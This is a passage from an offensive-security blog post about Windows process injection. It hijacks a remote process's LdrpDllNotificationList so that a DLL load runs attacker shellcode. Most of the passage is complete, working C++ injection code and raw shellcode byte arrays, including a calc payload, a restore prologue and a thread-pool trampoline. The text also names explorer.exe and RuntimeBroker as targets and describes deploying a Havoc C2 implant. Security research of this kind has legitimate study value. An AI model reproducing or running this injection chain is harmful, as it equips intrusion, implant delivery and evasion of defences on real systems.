Here are the results. On the right we can see our old code where we registered our DLL Notification Callback (MyCallback) and then loaded a new DLL using LoadLibrary to trigger the callback. I modified the code with getchar() right before the LoadLibrary trigger so I have the chance to execute the code above which you can see on the left. This code injects our newly created LDR_DLL_NOTIFICATION_ENTRY into the remote process. I then triggered the LoadLibrary and our shellcode got executed as expected. It works!

We're Not Done Yet

For the final POC (this time proof of concept😜) I wanted to execute a C2 Implant shellcode instead of popping calc, but when the shellcode got triggered the process would always crash. I created a basic loader to debug the shellcode and see what's different, why the calc shellcode works but the C2 shellcode doesn't?

I ran the shellcode loader and attached API Monitor to it and it became clear: the C2 shellcode loads other DLLs as well. This causes other callbacks to fire which trigger our shellcode again which leads to further callbacks. Do you see the issue here? Triggering a shellcode that loads another DLL will cause the thread to enter a loop and eventually crash the thread/process.

Looking at MSDN we can even see the warning for this issue:

https://learn.microsoft.com/en-us/windows/win32/devnotes/ldrdllnotification

In order to mitigate this I decided to create a mini shellcode, some kind of prologue shellcode. This will be placed right before our malicious shellcode and would get executed before it. This prologue shellcode would restore the original values of the LdrpDllNotificationList head's List.Flink attribute and the original first entry's (now second entry) List.Blink attribute, and by doing so would remove our malicious callback entry from the DLL Notification Callback List. Here is code for the concept above:

C++
// Pop Calc.exe Shellcode from Sektor7
unsigned char shellcode[276] = { 0xfc, 0x48, ... };

unsigned char restore[] = {
    0x41, 0x56,														// push r14
    0x49, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,		// move r14, 0x1122334455667788
    0x41, 0xC7, 0x06, 0x44, 0x33, 0x22, 0x11,						// mov dword [r14], 0x11223344
    0x41, 0xC7, 0x46, 0x04, 0x44, 0x33, 0x22, 0x11, 				// mov dword [r14+4], 0x11223344
    0x49, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,		// move r14, 0x1122334455667788
    0x41, 0xC7, 0x06, 0x44, 0x33, 0x22, 0x11,						// mov dword [r14], 0x11223344
    0x41, 0xC7, 0x46, 0x04, 0x44, 0x33, 0x22, 0x11, 				// mov dword [r14+4], 0x11223344
    0x41, 0x5e,														// pop r14
};

int main()
{
    // <snipped for brevity>

    // Allocate memory for our restore prologue + shellcode in the remote process
    LPVOID restoreEx = VirtualAllocEx(hProc, 0, sizeof(restore) + sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    printf("[+] Allocated memory for restore prologue + shellcode in remote process\n");
    printf("[+] Restore prologue address in remote process: 0x%p\n", restoreEx);

    // Offset the size of the restore prologue to get the shellcode address
    LPVOID shellcodeEx = (BYTE*)restoreEx + sizeof(restore);
    printf("[+] Shellcode address in remote process: 0x%p\n", shellcodeEx);

    // Write the shellcode to the remote process
    WriteProcessMemory(hProc, shellcodeEx, shellcode, sizeof(shellcode), nullptr);
    printf("[+] Shellcode has been written to remote process: 0x%p\n", shellcodeEx);

    // <snipped for brevity>
    
    // Set the Callback attribute to point to our restore prologue
    newEntry.Callback = (PLDR_DLL_NOTIFICATION_FUNCTION)restoreEx;
    
    // <snipped for brevity>

    // Calculate the addresses we need to overwrite with our new entry's address
    // The previous entry's Flink (head) and the next entry's Blink (original 1st entry)
    LPVOID previousEntryFlink = (LPVOID)((BYTE*)remoteHeadAddress + offsetof(LDR_DLL_NOTIFICATION_ENTRY, List) + offsetof(LIST_ENTRY, Flink));
    LPVOID nextEntryBlink = (LPVOID)((BYTE*)((PLDR_DLL_NOTIFICATION_ENTRY)remoteHeadEntry)->List.Flink + offsetof(LDR_DLL_NOTIFICATION_ENTRY, List) + offsetof(LIST_ENTRY, Blink));

    // buffer for the original values we are goind to overwrite
    unsigned char originalValue[8] = {};

    // Read the original value of the previous entry's Flink (head)
    ReadProcessMemory(hProc, previousEntryFlink, &originalValue, 8, nullptr);
    memcpy(&restore[4], &previousEntryFlink, 8); // Set address to restore for previous entry's Flink (head)
    memcpy(&restore[15], &originalValue[0], 4); // Set the value to restore (1st half of value)
    memcpy(&restore[23], &originalValue[4], 4); // Set the value to restore (2nd half of value)

    // Read the original value the next entry's Blink (original 1st entry)
    ReadProcessMemory(hProc, nextEntryBlink, &originalValue, 8, nullptr);
    memcpy(&restore[29], &nextEntryBlink, 8); // Set address to restore for next entry's Blink (original 1st entry)
    memcpy(&restore[40], &originalValue[0], 4); // Set the value to restore (1st half of value)
    memcpy(&restore[48], &originalValue[4], 4); // Set the value to restore (2nd half of value)

    // Write the restore prologue to the remote process
    WriteProcessMemory(hProc, restoreEx, restore, sizeof(restore), nullptr);
    printf("[+] Restore prologue has been written to remote process: 0x%p\n", restoreEx);

    // Overwrite the previous entry's Flink (head) with our new entry's address
    WriteProcessMemory(hProc, previousEntryFlink, &newEntryAddress, 8, nullptr);

    // Overwrite the next entry's Blink (original 1st entry) with our new entry's address
    WriteProcessMemory(hProc, nextEntryBlink, &newEntryAddress, 8, nullptr);

    printf("[+] LdrpDllNotificationList has been modified.\n");
    printf("[+] Our new entry has been inserted.\n");

    // <snipped for brevity>

}

Unfortunately this didn't work as expected. For some reason our newly created entry didn't get removed. After some trial and error I noticed that I can remove the newly created entry from another process (remotely) or another thread in the same process but not from the same thread meaning I can't remove my own entry from within it.

I came up with a cool solution. I will create a trampoline shellcode that uses Thread Pool Work Callback to offload the execution of the restore prologue and our malicious shellcode to another thread. This approach also has the added benefit of improved stability for the remote process since we are not hijacking any main thread, well, we actually do, with the trampoline shellcode, but that's for a very short time and we eventually give back control to the original thread.

I chose to use @C5pider's ShellcodeTemplate project to create the trampoline shellcode. We can, of course, create the trampoline shellcode from scratch, but I figured it was a good opportunity to give @C5pider a shoutout for this cool project and also introduce the topic of shellcoding (as if this blog post isn't packed already...)

Do You Have This In Shellcode?

A quick (and very basic) primer on shellcodes: a shellcode is a position independent code that basically can run anywhere in memory. It can do so because it's coded in a way that doesn't rely on any external functions, thus its offsets, which are based on its own location in memory, do not matter. Or, if it does rely on external functions it can find them in memory without any help from external functions.

Back to our trampoline shellcode. We need our shellcode to use the TpAllocWork, TpPostWork and TpReleaseWork functions to create and run a TpWorkCallback which would execute our restore prologue and malicious shellcode in a different thread.

P.S: For more information on TpWorkCallbacks you can check out this blog post by @ninjaparanoid.

Working with @C5pider's ShellcodeTemplate project is pretty easy. After cloning the project we simply edit the file Entry.c, this is what our shellcode executes:

ShellcodeTemplate\Source\Entry.c
#include <Core.h>
#include <Win32.h>

SEC( text, B ) VOID Entry( VOID ) 
{
    INSTANCE Instance = { };

    Instance.Modules.Kernel32   = LdrModulePeb( HASH_KERNEL32 ); 
    Instance.Modules.Ntdll      = LdrModulePeb( HASH_NTDLL ); 
    
    if ( Instance.Modules.Kernel32 != NULL )
    {
        // Hashes were calculated with Scripts/Hasher tool
        Instance.Win32.WaitForSingleObject = LdrFunction( Instance.Modules.Kernel32, 0xdf1b3da );
    }
    

    if ( Instance.Modules.Ntdll != NULL )
    {
        // Hashes were calculated with Scripts/Hasher tool
        Instance.Win32.TpAllocWork = LdrFunction( Instance.Modules.Ntdll, 0x3fc58c37 );
        Instance.Win32.TpPostWork = LdrFunction( Instance.Modules.Ntdll, 0x4d915ab2 );
        Instance.Win32.TpReleaseWork = LdrFunction( Instance.Modules.Ntdll, 0x27a9ff4d );
    }

    // ------ Code ------
    
    // The restore prologue address - this is a place holder to be changed during runtime
    PVOID restoreEx = 0x1111111111111111;

    // Creating our TpWorkCallback pointing it to our restore prologue address
    PTP_WORK WorkReturn = NULL;
    Instance.Win32.TpAllocWork( &WorkReturn, (PTP_WORK_CALLBACK)restoreEx, NULL, NULL );
    Instance.Win32.TpPostWork( WorkReturn );
    Instance.Win32.TpReleaseWork( WorkReturn );

    // Waiting for 1 second to let the TpWorkCallback finish
    Instance.Win32.WaitForSingleObject( (HANDLE)-1, 0x1000 );

} 

Notice that we've set our restore prologue address "restoreEx" as 0x1111111111111111. This is simply a place holder since we don't know what will be the restore prologue address in the remote process. We will use this function to patch it during runtime.

C++
BOOL MaskCompare(const BYTE* pData, const BYTE* bMask, const char* szMask)
{
	for (; *szMask; ++szMask, ++pData, ++bMask)
		if (*szMask == 'x' && *pData != *bMask)
			return FALSE;
	return TRUE;
}

DWORD_PTR FindPattern(DWORD_PTR dwAddress, DWORD dwLen, PBYTE bMask, PCHAR szMask)
{
	for (DWORD i = 0; i < dwLen; i++)
		if (MaskCompare((PBYTE)(dwAddress + i), bMask, szMask))
			return (DWORD_PTR)(dwAddress + i);

	return 0;
}

unsigned char trampoline[] = { 0x3c, 0x79, ... };

int main() {
    // <snipped for brevity>
    
    // Find our restoreEx place holder in the trampoline shellcode
	LPVOID restoreExInTrampoline = (LPVOID)FindPattern((DWORD_PTR)&trampoline, sizeof(trampoline), (PBYTE)"\x11\x11\x11\x11\x11\x11\x11\x11", (PCHAR)"xxxxxxxx");
	
	// Overwrite our restoreEx place holder with the address of our restore prologue
	memcpy(restoreExInTrampoline, &restoreEx, 8);
	
	// Write the trampoline shellcode to the remote process
    WriteProcessMemory(hProc, trampolineEx, trampoline, sizeof(trampoline), nullptr);
    printf("[+] trampoline has been written to remote process: 0x%p\n", trampolineEx);

    // <snipped for brevity>
}

We also need to edit the Core.h file and add our function definitions

ShellcodeTemplate\Include\Core.h
#include <windows.h>
#include <Macros.h>

UINT_PTR GetRIP( VOID );

NTSTATUS NTAPI TpAllocWork(PTP_WORK* ptpWrk, PTP_WORK_CALLBACK pfnwkCallback, PVOID OptionalArg, PTP_CALLBACK_ENVIRON CallbackEnvironment);
VOID NTAPI TpPostWork(PTP_WORK);
VOID NTAPI TpReleaseWork(PTP_WORK);

typedef struct {

    struct {
        WIN32_FUNC( TpAllocWork );
        WIN32_FUNC( TpPostWork );
        WIN32_FUNC( TpReleaseWork );
        WIN32_FUNC( WaitForSingleObject );
    } Win32; 

    struct {
        // Basics
        HMODULE     Kernel32;
        HMODULE     Ntdll;
    } Modules;

} INSTANCE, *PINSTANCE;

Finally, after compiling the program and extracting the shellcode for our trampoline (simply use make x64 in the ShellcodeTemplate project), here is the final working code:

C++
// Pop Calc.exe Shellcode from Sektor7
unsigned char shellcode[276] = { 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x0, 0x0, 0x0, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0xf, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x2, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x1, 0xd0, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x1, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x1, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x41, 0x8b, 0xc, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x1, 0xd0, 0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x48, 0x8d, 0x8d, 0x1, 0x1, 0x0, 0x0, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0xa, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x6, 0x7c, 0xa, 0x80, 0xfb, 0xe0, 0x75, 0x5, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x0, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x0 };

unsigned char restore[] = {
    0x41, 0x56,														// push r14
    0x49, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,		// move r14, 0x1122334455667788
    0x41, 0xC7, 0x06, 0x44, 0x33, 0x22, 0x11,						// mov dword [r14], 0x11223344
    0x41, 0xC7, 0x46, 0x04, 0x44, 0x33, 0x22, 0x11, 				// mov dword [r14+4], 0x11223344
    0x49, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,		// move r14, 0x1122334455667788
    0x41, 0xC7, 0x06, 0x44, 0x33, 0x22, 0x11,						// mov dword [r14], 0x11223344
    0x41, 0xC7, 0x46, 0x04, 0x44, 0x33, 0x22, 0x11, 				// mov dword [r14+4], 0x11223344
    0x41, 0x5e,														// pop r14
};

// Trampoline shellcode for creating TpAllocWork for our restore prologue and malicious shellcode
// Created using https://github.com/Cracked5pider/ShellcodeTemplate
unsigned char trampoline[] = { 0x56, 0x48, 0x89, 0xe6, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x20, 0xe8, 0xf, 0x0, 0x0, 0x0, 0x48, 0x89, 0xf4, 0x5e, 0xc3, 0x66, 0x2e, 0xf, 0x1f, 0x84, 0x0, 0x0, 0x0, 0x0, 0x0, 0x41, 0x55, 0xb9, 0xf0, 0x1d, 0xd3, 0xad, 0x41, 0x54, 0x57, 0x56, 0x53, 0x31, 0xdb, 0x48, 0x83, 0xec, 0x30, 0xe8, 0xf9, 0x0, 0x0, 0x0, 0xb9, 0x53, 0x17, 0xe6, 0x70, 0x49, 0x89, 0xc5, 0xe8, 0xec, 0x0, 0x0, 0x0, 0x49, 0x89, 0xc4, 0x4d, 0x85, 0xed, 0x74, 0x10, 0xba, 0xda, 0xb3, 0xf1, 0xd, 0x4c, 0x89, 0xe9, 0xe8, 0x28, 0x1, 0x0, 0x0, 0x48, 0x89, 0xc3, 0x4d, 0x85, 0xe4, 0x74, 0x32, 0x4c, 0x89, 0xe1, 0xba, 0x37, 0x8c, 0xc5, 0x3f, 0xe8, 0x13, 0x1, 0x0, 0x0, 0x4c, 0x89, 0xe1, 0xba, 0xb2, 0x5a, 0x91, 0x4d, 0x48, 0x89, 0xc7, 0xe8, 0x3, 0x1, 0x0, 0x0, 0x4c, 0x89, 0xe1, 0xba, 0x4d, 0xff, 0xa9, 0x27, 0x48, 0x89, 0xc6, 0xe8, 0xf3, 0x0, 0x0, 0x0, 0x49, 0x89, 0xc4, 0xeb, 0x7, 0x45, 0x31, 0xe4, 0x31, 0xf6, 0x31, 0xff, 0x45, 0x31, 0xc9, 0x45, 0x31, 0xc0, 0x48, 0x8d, 0x4c, 0x24, 0x28, 0x48, 0xba, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x0, 0x0, 0x0, 0x0, 0xff, 0xd7, 0x48, 0x8b, 0x4c, 0x24, 0x28, 0xff, 0xd6, 0x48, 0x8b, 0x4c, 0x24, 0x28, 0x41, 0xff, 0xd4, 0xba, 0x0, 0x10, 0x0, 0x0, 0x48, 0x83, 0xc9, 0xff, 0xff, 0xd3, 0x48, 0x83, 0xc4, 0x30, 0x5b, 0x5e, 0x5f, 0x41, 0x5c, 0x41, 0x5d, 0xc3, 0x49, 0x89, 0xd1, 0x49, 0x89, 0xc8, 0xba, 0x5, 0x15, 0x0, 0x0, 0x8a, 0x1, 0x4d, 0x85, 0xc9, 0x75, 0x6, 0x84, 0xc0, 0x75, 0x16, 0xeb, 0x2f, 0x41, 0x89, 0xca, 0x45, 0x29, 0xc2, 0x4d, 0x39, 0xca, 0x73, 0x24, 0x84, 0xc0, 0x75, 0x5, 0x48, 0xff, 0xc1, 0xeb, 0x7, 0x3c, 0x60, 0x76, 0x3, 0x83, 0xe8, 0x20, 0x41, 0x89, 0xd2, 0xf, 0xb6, 0xc0, 0x48, 0xff, 0xc1, 0x41, 0xc1, 0xe2, 0x5, 0x44, 0x1, 0xd0, 0x1, 0xc2, 0xeb, 0xc4, 0x89, 0xd0, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x57, 0x56, 0x48, 0x89, 0xce, 0x53, 0x48, 0x83, 0xec, 0x20, 0x65, 0x48, 0x8b, 0x4, 0x25, 0x60, 0x0, 0x0, 0x0, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x20, 0x48, 0x89, 0xfb, 0xf, 0xb7, 0x53, 0x48, 0x48, 0x8b, 0x4b, 0x50, 0xe8, 0x85, 0xff, 0xff, 0xff, 0x89, 0xc0, 0x48, 0x39, 0xf0, 0x75, 0x6, 0x48, 0x8b, 0x43, 0x20, 0xeb, 0x11, 0x48, 0x8b, 0x1b, 0x48, 0x85, 0xdb, 0x74, 0x5, 0x48, 0x39, 0xdf, 0x75, 0xd9, 0x48, 0x83, 0xc8, 0xff, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0x5e, 0x5f, 0xc3, 0x41, 0x57, 0x41, 0x56, 0x49, 0x89, 0xd6, 0x41, 0x55, 0x41, 0x54, 0x55, 0x31, 0xed, 0x57, 0x56, 0x53, 0x48, 0x89, 0xcb, 0x48, 0x83, 0xec, 0x28, 0x48, 0x63, 0x41, 0x3c, 0x8b, 0xbc, 0x8, 0x88, 0x0, 0x0, 0x0, 0x48, 0x1, 0xcf, 0x44, 0x8b, 0x7f, 0x20, 0x44, 0x8b, 0x67, 0x1c, 0x44, 0x8b, 0x6f, 0x24, 0x49, 0x1, 0xcf, 0x39, 0x6f, 0x18, 0x76, 0x31, 0x89, 0xee, 0x31, 0xd2, 0x41, 0x8b, 0xc, 0xb7, 0x48, 0x1, 0xd9, 0xe8, 0x15, 0xff, 0xff, 0xff, 0x4c, 0x39, 0xf0, 0x75, 0x18, 0x48, 0x1, 0xf6, 0x48, 0x1, 0xde, 0x42, 0xf, 0xb7, 0x4, 0x2e, 0x48, 0x8d, 0x4, 0x83, 0x42, 0x8b, 0x4, 0x20, 0x48, 0x1, 0xd8, 0xeb, 0x4, 0xff, 0xc5, 0xeb, 0xca, 0x48, 0x83, 0xc4, 0x28, 0x5b, 0x5e, 0x5f, 0x5d, 0x41, 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0x41, 0x5f, 0xc3, 0x90, 0x90, 0x90, 0xe8, 0x0, 0x0, 0x0, 0x0, 0x58, 0x48, 0x83, 0xe8, 0x5, 0xc3, 0xf, 0x1f, 0x44, 0x0 };

int main()
{
    // Get local LdrpDllNotificationList head address
    LPVOID localHeadAddress = (LPVOID)GetDllNotificationListHead();
    printf("[+] Local LdrpDllNotificationList head address: 0x%p\n", localHeadAddress);

    // Get local NTDLL base address
    HANDLE hNtdll = GetModuleHandleA("NTDLL.dll");
    printf("[+] Local NTDLL base address: 0x%p\n", hNtdll);

    // Calculate the offset of LdrpDllNotificationList from NTDLL base
    int offsetFromBase = (BYTE*)localHeadAddress - (BYTE*)hNtdll;
    printf("[+] LdrpDllNotificationList offset from NTDLL base: 0x%X\n", offsetFromBase);

    // Open handle to remote process
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 31588);
    printf("[+] Got handle to remote process\n");

    // Get remote NTDLL base address
    LPVOID remoteNtdllBase = GetNtdllBase(hProc);
    LPVOID remoteHeadAddress = (BYTE*)remoteNtdllBase + offsetFromBase;
    printf("[+] Remote LdrpDllNotificationList head address 0x%p\n", remoteHeadAddress);

    // Print the remote Dll Notification List
    PrintDllNotificationList(hProc, remoteHeadAddress);

    // Allocate memory for our trampoline + restore prologue + shellcode in the remote process
    LPVOID trampolineEx = VirtualAllocEx(hProc, 0, sizeof(restore) + sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    printf("[+] Allocated memory for restore trampoline + prologue + shellcode in remote process\n");
    printf("[+] Trampoline address in remote process: 0x%p\n", trampolineEx);
    
    // Offset the size of the trampoline to get the restore prologue address
    LPVOID restoreEx = (BYTE*)trampolineEx + sizeof(trampoline);
    printf("[+] Restore prologue address in remote process: 0x%p\n", restoreEx);

    // Offset the size of the trampoline and restore prologue to get the shellcode address
    LPVOID shellcodeEx = (BYTE*)trampolineEx + sizeof(trampoline) + sizeof(restore);
    printf("[+] Shellcode address in remote process: 0x%p\n", shellcodeEx);

    // Find our restoreEx place holder in the trampoline shellcode
    LPVOID restoreExInTrampoline = (LPVOID)FindPattern((DWORD_PTR)&trampoline, sizeof(trampoline), (PBYTE)"\x11\x11\x11\x11\x11\x11\x11\x11", (PCHAR)"xxxxxxxx");

    // Overwrite our restoreEx place holder with the address of our restore prologue
    memcpy(restoreExInTrampoline, &restoreEx, 8);

    // Write the trampoline shellcode to the remote process
    WriteProcessMemory(hProc, trampolineEx, trampoline, sizeof(trampoline), nullptr);
    printf("[+] trampoline has been written to remote process: 0x%p\n", trampolineEx);

    // Write the shellcode to the remote process
    WriteProcessMemory(hProc, shellcodeEx, shellcode, sizeof(shellcode), nullptr);
    printf("[+] Shellcode has been written to remote process: 0x%p\n", shellcodeEx);

    // Create a new LDR_DLL_NOTIFICATION_ENTRY
    LDR_DLL_NOTIFICATION_ENTRY newEntry = {};
    newEntry.Context = NULL;

    // Set the Callback attribute to point to our trampoline
    newEntry.Callback = (PLDR_DLL_NOTIFICATION_FUNCTION)trampolineEx;

    // We want our new entry to be the first in the list 
    // so its List.Blink attribute should point to the head of the list
    newEntry.List.Blink = (PLIST_ENTRY)remoteHeadAddress;

    // Allocate memory buffer for LDR_DLL_NOTIFICATION_ENTRY
    BYTE* remoteHeadEntry = (BYTE*)malloc(sizeof(LDR_DLL_NOTIFICATION_ENTRY));

    // Read the head entry from the remote process
    ReadProcessMemory(hProc, remoteHeadAddress, remoteHeadEntry, sizeof(LDR_DLL_NOTIFICATION_ENTRY), nullptr);

    // Set the new entry's List.Flink attribute to point to the original first entry in the list
    newEntry.List.Flink = ((PLDR_DLL_NOTIFICATION_ENTRY)remoteHeadEntry)->List.Flink;

    // Allocate memory for our new entry
    LPVOID newEntryAddress = VirtualAllocEx(hProc, 0, sizeof(LDR_DLL_NOTIFICATION_ENTRY), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("[+] Allocated memory for new entry in remote process: 0x%p\n", newEntryAddress);

    // Write our new entry to the remote process
    WriteProcessMemory(hProc, (BYTE*)newEntryAddress, &newEntry, sizeof(LDR_DLL_NOTIFICATION_ENTRY), nullptr);
    printf("[+] New entry has been written to remote process: 0x%p\n", newEntryAddress);

    // Calculate the addresses we need to overwrite with our new entry's address
    // The previous entry's Flink (head) and the next entry's Blink (original 1st entry)
    LPVOID previousEntryFlink = (LPVOID)((BYTE*)remoteHeadAddress + offsetof(LDR_DLL_NOTIFICATION_ENTRY, List) + offsetof(LIST_ENTRY, Flink));
    LPVOID nextEntryBlink = (LPVOID)((BYTE*)((PLDR_DLL_NOTIFICATION_ENTRY)remoteHeadEntry)->List.Flink + offsetof(LDR_DLL_NOTIFICATION_ENTRY, List) + offsetof(LIST_ENTRY, Blink));

    // buffer for the original values we are goind to overwrite
    unsigned char originalValue[8] = {};

    // Read the original value of the previous entry's Flink (head)
    ReadProcessMemory(hProc, previousEntryFlink, &originalValue, 8, nullptr);
    memcpy(&restore[4], &previousEntryFlink, 8); // Set address to restore for previous entry's Flink (head)
    memcpy(&restore[15], &originalValue[0], 4); // Set the value to restore (1st half of value)
    memcpy(&restore[23], &originalValue[4], 4); // Set the value to restore (2nd half of value)

    // Read the original value the next entry's Blink (original 1st entry)
    ReadProcessMemory(hProc, nextEntryBlink, &originalValue, 8, nullptr);
    memcpy(&restore[29], &nextEntryBlink, 8); // Set address to restore for next entry's Blink (original 1st entry)
    memcpy(&restore[40], &originalValue[0], 4); // Set the value to restore (1st half of value)
    memcpy(&restore[48], &originalValue[4], 4); // Set the value to restore (2nd half of value)

    // Write the restore prologue to the remote process
    WriteProcessMemory(hProc, restoreEx, restore, sizeof(restore), nullptr);
    printf("[+] Restore prologue has been written to remote process: 0x%p\n", restoreEx);

    // Overwrite the previous entry's Flink (head) with our new entry's address
    WriteProcessMemory(hProc, previousEntryFlink, &newEntryAddress, 8, nullptr);

    // Overwrite the next entry's Blink (original 1st entry) with our new entry's address
    WriteProcessMemory(hProc, nextEntryBlink, &newEntryAddress, 8, nullptr);

    printf("[+] LdrpDllNotificationList has been modified.\n");
    printf("[+] Our new entry has been inserted.\n");

    // Print the remote Dll Notification List
    PrintDllNotificationList(hProc, remoteHeadAddress);

}

Here are the results (for the sake of the photo the shellcode is still spawning calc):

Finding The Right Targets

Up until now this was all done as a POC with a manufactured target process (RegisterDllNotification.exe). In real situations, we would need to choose our targets carefully. To trigger our shellcode and complete the injection the target process needs to load or unload a DLL. This does not happen in every process and all the time so prior research into our target process is needed.

I used API Monitor on my machine and looked for processes that execute the functions containing the words Library and Load:

I found that most instances of RuntimeBroker executes the functions LdrLoadDll and LdrUnloadDll every minute or so:

Explorer.exe does this almost every 5 seconds:

That makes both RuntimeBroker and explorer a good candidates for this injection. I will leave finding extra targets, as well as making this injection more OPSEC, as an exercise for the reader.

Conclusions

It has been quite a journey to research this technique, and even more so, to create this blog. I hope this has been informative and will encourage you to further research this type of techniques.

And before we finish, here is the final POC of this technique, injecting Havoc C2 shellcode into the explorer process:

Acknowledgments